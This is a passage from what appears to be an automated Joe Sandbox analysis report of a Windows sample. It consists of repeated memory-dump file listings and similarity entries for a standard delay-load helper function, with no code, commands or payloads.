                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7EAF9
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
